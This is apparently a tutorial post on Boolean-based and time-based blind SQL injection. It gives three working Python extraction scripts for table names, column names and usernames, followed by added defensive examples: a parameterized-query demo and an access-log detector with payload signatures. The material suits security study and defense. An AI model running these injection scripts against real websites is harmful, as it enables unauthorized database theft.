Time-based blind injection and Boolean-based blind injection: functions for retrieving tables, columns, and row data

Published: 2025-02-14

Boolean-based Blind SQL Injection

Boolean-based blind injection works by sending a query to the database and judging from the page's response whether that query evaluated to true or false. Even though the database echoes no data back, as long as the page behaves differently depending on the query's result, an attacker can use that difference to infer the desired information step by step.

Time-based Blind SQL Injection

Time-based blind injection is similar to Boolean-based blind injection, but instead of relying on visible feedback from the page, it infers information from the delay caused when the SQL statement executes. If the query condition is true, a delaying operation is triggered (such as the SLEEP() function in MySQL), which delays the page's response; if it is false, the page responds immediately.
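Where the blind oracle comes from, as an added example that is not part of the original post: a vulnerable lookup that pastes the request parameter into the SQL text, next to a parameterized version, both run against a constructed in-memory SQLite table. Two probes in the shape used on this page (a closing quote, an AND condition, a comment marker) make the vulnerable function answer differently for a true and a false condition, while the parameterized function answers the same either way. The table contents, function names and probes are assumptions for the demo; SQLite's `--` comment stands in for MySQL's `#`.

```python
import sqlite3


def make_db():
    # Constructed demo table; the rows are made up and not from the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def lookup_vulnerable(conn, user_id):
    # The raw request parameter becomes part of the SQL text. A quote closes
    # the literal, and whatever follows is parsed as SQL, so the caller can
    # append a condition whose truth value steers the result.
    sql = "SELECT username FROM users WHERE id='%s'" % user_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_parameterized(conn, user_id):
    # The value travels separately from the statement text. It can only ever
    # be compared as a value; it is never parsed as SQL.
    sql = "SELECT username FROM users WHERE id=?"
    row = conn.execute(sql, (user_id,)).fetchone()
    return row[0] if row else None


# Assumed probes: same shape as the page's payloads (quote, AND, comment),
# with a condition that is always true and one that is always false.
TRUE_PROBE = "1' AND 1=1--"
FALSE_PROBE = "1' AND 1=2--"


def oracle_leaks(lookup, conn):
    """True when the two probes yield different answers, i.e. the endpoint
    behaves as a yes/no oracle for attacker-chosen conditions."""
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable leaks:    ", oracle_leaks(lookup_vulnerable, db))
    print("parameterized leaks: ", oracle_leaks(lookup_parameterized, db))
```

The parameterized lookup does not need to recognise or filter the probe text: the integer column is compared against the literal string `1' AND 1=1--`, which matches no row, so a true and a false condition are indistinguishable and the blind techniques described above have nothing to measure.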

Retrieving table names

import time
import requests


def get_tablename(url):
    # Time-based blind extraction of table names from the 'security' schema,
    # one character at a time via binary search over printable ASCII (32..127).
    offset = 0
    while True:
        tablename = ''
        for i in range(1, 100):
            low = 32
            high = 128
            # Each request asks "is the character code > mid?"; the answer is
            # read from the response time alone.
            while low < high:
                mid = (low + high) // 2
                payload = "1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1 offset %d),%d,1))>%d, sleep(5), 1)# " % (offset, i, mid)
                res = {"id": payload}
                start_time = time.time()
                r = requests.get(url, params=res, timeout=10)
                response_time = time.time() - start_time
                # A delay of at least 5 s means the condition was true
                if response_time >= 5:
                    low = mid + 1
                else:
                    high = mid
            # The loop ends with low == high == the character code. ascii('')
            # and ascii(NULL) never exceed mid, so the search bottoms out at 32
            # (space) once the name, or the list of names, is exhausted.
            if low == 32:
                break
            tablename += chr(low)
        if not tablename:
            break
        print(f"表{offset + 1}: {tablename}")
        offset += 1

Retrieving column names

import requests


def get_columnnames(url):
    # Boolean-based blind extraction of column names from the 'users' table,
    # one character at a time via binary search over printable ASCII (32..127).
    offset = 0
    while True:
        columnname = ''
        for i in range(1, 100):
            low = 32
            high = 128
            # Each request asks "is the character code > mid?"; the page's
            # true-branch text "You are in..." is the only feedback used.
            while low < high:
                mid = (low + high) // 2
                payload = "1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1 offset %d),%d,1))>%d-- " % (offset, i, mid)
                res = {"id": payload}
                r = requests.get(url, params=res, timeout=10)
                if "You are in..." in r.text:
                    low = mid + 1
                else:
                    high = mid
            # The loop ends with low == high == the character code. ascii('')
            # and ascii(NULL) never exceed mid, so the search bottoms out at 32
            # (space) once the name, or the list of names, is exhausted.
            if low == 32:
                break
            columnname += chr(low)
        if not columnname:
            break
        print(f"列{offset + 1}: {columnname}")
        offset += 1

Retrieving row data

import requests


def get_columndata(url):
    # Boolean-based blind extraction of the username column of 'users', one
    # row at a time, one character at a time via binary search over 32..127.
    offset = 0
    while True:
        username = ''
        for i in range(1, 100):
            low = 32
            high = 128
            # Each request asks "is the character code > mid?"; the page's
            # true-branch text "You are in..." is the only feedback used.
            while low < high:
                mid = (low + high) // 2
                payload = "1' and ascii(substr((select username from users limit 1 offset %d),%d,1))>%d# " % (offset, i, mid)
                res = {"id": payload}
                r = requests.get(url, params=res, timeout=5)
                r.raise_for_status()
                if "You are in..." in r.text:
                    low = mid + 1
                else:
                    high = mid
            # The loop ends with low == high == the character code. ascii('')
            # and ascii(NULL) never exceed mid, so the search bottoms out at 32
            # (space) once the value, or the set of rows, is exhausted.
            if low == 32:
                break
            username += chr(low)
        if not username:
            break
        print(f"数据{offset + 1}: {username}")
        offset += 1
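What the three scripts above look like from the server side, as an added example that is not part of the original post: a small detector run over constructed access-log lines (the log format, IP addresses and timings are made up). It percent-decodes each query string, flags the time-based (`sleep(` / `benchmark(`) and Boolean-based (`ascii(substr(`) signatures and information_schema enumeration, records whether a time-based probe's response time actually reached the delay, and groups suspicious requests by their payload shape with numbers masked, which exposes the binary-search pattern of many requests that differ only in the compared threshold. Thresholds and signature lists are assumptions to tune per application.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (not from any real system). Format, one per line:
# client_ip "METHOD target" status response_seconds
SAMPLE_LOG = """\
10.0.0.5 "GET /index.php?id=1" 200 0.012
10.0.0.5 "GET /index.php?id=2" 200 0.010
10.0.0.9 "GET /index.php?id=1%27+and+if(ascii(substr((select+table_name+from+information_schema.tables+limit+1),1,1))%3E80,+sleep(5),+1)%23" 200 5.021
10.0.0.9 "GET /index.php?id=1%27+and+if(ascii(substr((select+table_name+from+information_schema.tables+limit+1),1,1))%3E104,+sleep(5),+1)%23" 200 0.011
10.0.0.9 "GET /index.php?id=1%27+and+ascii(substr((select+column_name+from+information_schema.columns+limit+1),1,1))%3E64--+" 200 0.009
10.0.0.9 "GET /index.php?id=1%27+and+ascii(substr((select+column_name+from+information_schema.columns+limit+1),1,1))%3E96--+" 200 0.010
10.0.0.7 "GET /index.php?id=3" 200 0.011
"""

LOG_RE = re.compile(r'^(\S+) "(\w+) (\S+)" (\d{3}) ([\d.]+)$')

# Signatures of the two blind techniques described on this page
TIME_BASED = re.compile(r'\b(sleep|benchmark)\s*\(', re.I)
BOOLEAN_BASED = re.compile(r'\bascii\s*\(\s*substr(ing)?\s*\(', re.I)
SCHEMA_PROBE = re.compile(r'information_schema\.', re.I)
NUM = re.compile(r'\d+')

SLOW_THRESHOLD = 3.0  # seconds; assumed, set from the app's normal latency


def parse_line(line):
    """Decode one log line into ip, decoded query parameters and timing."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, _status, secs = m.groups()
    query = parse_qs(urlsplit(target).query)  # parse_qs percent-decodes
    return {"ip": ip,
            "params": {k: v[0] for k, v in query.items()},
            "seconds": float(secs)}


def classify(entry):
    """Return the indicator names matched by one decoded request."""
    hits = []
    for value in entry["params"].values():
        if TIME_BASED.search(value):
            hits.append("time_based_payload")
            if entry["seconds"] >= SLOW_THRESHOLD:
                hits.append("delay_observed")  # the sleep actually fired
        elif BOOLEAN_BASED.search(value):
            hits.append("boolean_based_payload")
        if SCHEMA_PROBE.search(value):
            hits.append("schema_enumeration")
    return hits


def analyse(log_text):
    """Per-IP indicator counts; IPs with no indicators are omitted."""
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for h in classify(entry):
            per_ip[entry["ip"]][h] += 1
    return {ip: dict(c) for ip, c in per_ip.items()}


def probe_templates(log_text):
    """Group flagged requests by payload shape with digits masked. A blind
    binary search yields many hits on one template that differ only in the
    compared threshold (and the substr position), which is the pattern to
    alert on even when an individual request looks benign."""
    templates = defaultdict(Counter)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None or not classify(entry):
            continue
        for value in entry["params"].values():
            templates[entry["ip"]][NUM.sub("N", value)] += 1
    return {ip: dict(c) for ip, c in templates.items()}


if __name__ == "__main__":
    for ip, counts in analyse(SAMPLE_LOG).items():
        print(ip, counts)
    for ip, shapes in probe_templates(SAMPLE_LOG).items():
        for shape, n in shapes.items():
            print(ip, n, shape)
```

The signature matches catch the scripts as written, but the template grouping is the more durable signal: renaming or re-encoding the payload still leaves a client issuing a long run of requests whose only variation is a number, at roughly seven requests per recovered character.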